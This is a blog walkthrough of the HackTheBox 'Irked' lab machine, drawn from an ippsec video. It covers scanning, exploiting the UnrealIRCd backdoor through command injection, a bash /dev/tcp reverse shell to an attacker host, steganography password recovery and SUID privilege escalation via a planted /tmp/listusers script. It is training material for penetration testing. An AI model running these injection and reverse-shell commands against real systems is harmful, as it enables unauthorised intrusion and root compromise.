Irked Hackthebox

Dissection of ippsec’s youtube video HackTheBox - Irked (Fixed). Box includes enumeration to UnrealIRCd server, stenography and tools, SUID stickybit that leads to root escalation.


Legal Usage: The information provided by [email protected] is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.

By continued reading, you acknowledge the aforementioned user risks/responsibilities.


This series of write-up will contain comprehensive write-ups of hackthebox machines. In an effort to sharpen reporting techniques and help solidify the understand and methodologies used during penetration testing.

#hailippsec

YouTube Link: https://www.youtube.com/watch?v=OGFTM_qvtVI

Enumeration

Nmap scan

1
nmap -sC -sV -oA nmap/irked 10.10.10.117

web-server

Check out web-server on port 80

since it says IRC move to perform full scan of box

full nmap scan

1
nmap -vvv -p- 10.10.10.117

return to web-webserver

check out robots.txt

doesn’t exisit

check for ~root - some apache servers allow this (old/not very often)

run gobuster

1
gobuster -u http://10.10.10.117 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -o root.log

return to web-server

check /index.html

we get this main page. Establishing that the target is html.

try index.aspx

try Default.aspx

return to gobuster

discovered /manual

check out /manual

gives default apache page. Copywrite is 2014 which could me its old.

nmap full port scan

returned an open port of 8067

Begin to enumerate what this port is with nmap:

1
nmap -sC -sV -p 8067 10.10.10.10.117

port is open with UnrealIRCd.

connect to port 8067 with ncat

1
ncat 10.10.10.117 8067

since using the hostname we need to edit the ‘hosts’ on our local box to reflect

edit host file:

1
vi /etc/hosts

check that hostname works with firefox and for any virtual host routing issues.

IRCd banner information grab

google “RFC IRC”

connect to IRC with ncat and pass the parameters

1
2
3
PASS ippsec
NICK ippsec
USER ippsec PleaseSubscribe AndComment :ippsec

Search for unrealirc change log for version name

end up finding multiple vulnerabilities

searchsploit UnrealIRC

1
searchsploit unreal

metasploit backdoor command execution identified.

google “unrealirc backdoor” leads to Link: https://lwn.net/Articles/392201/ which describes exactly how the exploit works.

nutshell: Backdoor disguised to look like debug code:

moving forward without metasploit as now know how the exploit functions.

Setup tcpdump pipe to UnrealIRC

1
tcpdump -i tun0 icmp

setup ping to UnrealIrc:

1
echo "AB; ping -c 1 10.10.14.3" | ncat 10.10.10.117 8067

after connection to IRC timed out we got an execution of the ping (ICMP) that was captured on tcpdump.

Command Execution

from the realization that a ping can be sent via the “AB” exploit now move to create a reverse shell

setup listener & send reverse shell

1
ncat -lvnp 9001

reverse shell via IRC:

1
echo "AB; bash -i >& /dev/tcp/10.10.14.3/9001 0>&1" | ncat 10.10.10.117 8067

wait for timeout… which didn’t result in a shell.

retry but putting bash ' within the command just incase system is linked to nsh or dash

1
echo "AB;  bash 'bash -i >& /dev/tcp/10.10.14.3/9001 0>&1'" | ncat 10.10.10.117 8067

connection established and reverse shell.

upgrade shell

1
2
3
4
5
6
python -c 'import pty;pty.spawn("/bin/bash")'
background with ctrl+z
stty raw -echo
fg (enter) (enter)

export TERM=xterm

Enumerate box

print working directory

1
pwd ![](https://paper-attachments.dropbox.com/s_ECCB58BFC7B8C7FB4F76DF55CC98C0E5842EECCD8EA52152FDA61793F88C4ED5_1556514916306_image.png)

search directory:

check .bash_history file:

1
cat .bash_history | less

found a cd djmardov

navigate to cd djmardov

check when kernal was compiled: uname -a

check for hidden files find . -ls

quite a few permission denied. find . -ls -type f

more permission denied.

discovered user.txt

check /Documents

we can not read because we are not djmardov

there is a .backup

and now we have a backup password for some stenography.

there has only been one image on this box the entire time and so now download locally

1
curl http://10.10.10.117/irked.jpg -o irked.jpg

use steghide

if not installed download via:

1
apt install steghide

most commonly use on CTFs:

1
steghide extract -sf irked.jp -p upUPdownDOWNdownLRlrBAbaSSss

ouputted a password file and a string

Priv-Esc

SSH Attempt as djmardov

1
2
ssh [email protected]
(password: above string)

check files

1
ls -al

Looking for anything obvious.

return to user.txt

1
find . | grep -i user.txt

Enumeration with LinEnum

create local web server hosting the LinEnum

1
python -m SimpleHTTPServer 

execute

1
bash LinEnum.sh

SUID files that stick out have last been modified in “2018”

exim4 = mail server viewuser = interesting prospect

viewuser binary

Check SUID/sticky bit on /usr/bin/viewuser

1
ls -la /usr/bin/viewuser

indeed this binary has the ability to run as root.

Test the functionality of viewuser

copy binary off remote box via base64

1
base64 -w0 /usr/bin/viewuser 

(copy to clipboard)

decode base64 locally:

1
base64 -d viewuser.b64 > viewuser

-could have been opened with Ghidra or Ida Pro opting to use strace

strace = list all sys calls

1
strace ./viewuser

(difficult to read)

ltrace = another sys call outputer

1
ltrace ./viewuser

the system(call) uses the variable “who” with no full path included which could lead to an entry to overwrite value. Which afterword changes the SUID and executes */tmp/listusers*.

Modify /tmp/listusers (target box)

1
2
3
#!/bin/bash
echo "Sending a shell"
/bin/bash

change chmod to executable

1
chmod +x /tmp/listusers

which if executed launches a shell

Return to viewusers who en turn will execute this file should launch a bash shell as root.

1
viewusers

secondary exploit of “who” statement

what should be seen is “/usr/bin/who”

Locate who

1
which who

change PATH

1
2
export PATH=/dev/shm:$PATH
echo $PATH

now we can edit who

1
2
3
4
5
vi who
(insert above /bin/bash)
#!/bin/bash
echo "Sending a shell"
/bin/bash

change chmod to executable

1
2
chmod +x who
viewuser

did not priv-esc because the “who” calls the /bin/bash before the setuid(0) in the function causing it not to be vulnerable.

Loot&Root


don’t know who ippsec is? check him out at:

Youtube: https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA Twitter: https://twitter.com/ippsec

#hailippsec